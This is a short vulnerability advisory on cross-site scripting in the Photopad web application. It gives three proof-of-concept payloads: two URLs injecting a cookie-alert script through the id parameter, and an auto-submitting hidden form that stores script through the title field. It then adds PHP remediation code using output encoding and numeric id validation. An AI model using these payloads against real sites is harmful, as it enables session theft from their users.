High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Photopad which could be exploited to perform cross-site scripting attacks.
1.
http://host/files.php?action=edit&id=999"><script>alert(document.cookie)</script>
2.
http://host/gallery.php?action=view&id=999"><script>alert(document.cookie)</script>
3.
<form action="http://host/files.php?action=edit&id=2" method="post" name="main">
<input type="hidden" name="data[title]" value='title"><script>alert(document.cookie)</script>'>
<input type="hidden" name="data[tags]" value='tag'>
</form>
<script>
document.main.submit();
</script>
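
All three cases rely on a request value being written into an HTML attribute without encoding, so `">` closes the attribute and the tag. The following is an added example of the corresponding fix, not Photopad's code: the function names and markup are hypothetical, and only the parameter names `id`, `data[title]` and `data[tags]` are taken from the requests above.

```php
<?php
// Added example, not Photopad source. Function names and markup are
// hypothetical; only the parameter names come from the advisory above.

// Encode for HTML text and quoted-attribute contexts. ENT_QUOTES converts both
// " and ', so a value cannot close the attribute it is written into.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// The id parameter is a record number: accept digits only, reject the rest.
function parse_id($raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return null;
    }
    return (int) $raw;
}

// Render the edit form with every reflected value encoded at output time.
function render_edit_form(int $id, array $data): string
{
    $title  = is_string($data['title'] ?? null) ? $data['title'] : '';
    $tags   = is_string($data['tags'] ?? null) ? $data['tags'] : '';
    $action = 'files.php?action=edit&id=' . $id;
    return '<form action="' . h($action) . '" method="post">'
         . '<input type="text" name="data[title]" value="' . h($title) . '">'
         . '<input type="text" name="data[tags]" value="' . h($tags) . '">'
         . '</form>';
}

// Constructed sample input with the same shape as the requests above.
$get  = ['id' => '999"><script>alert(document.cookie)</script>'];
$post = ['data' => ['title' => 'title"><script>alert(document.cookie)</script>',
                    'tags'  => 'tag']];

// Cases 1 and 2: a non-numeric id is rejected before anything is rendered.
$id = parse_id($get['id']);
echo $id === null ? "400 Invalid id\n" : render_edit_form($id, $post['data']) . "\n";

// Case 3: with a valid id, the title is emitted as inert, encoded text.
echo render_edit_form(2, $post['data']), "\n";
```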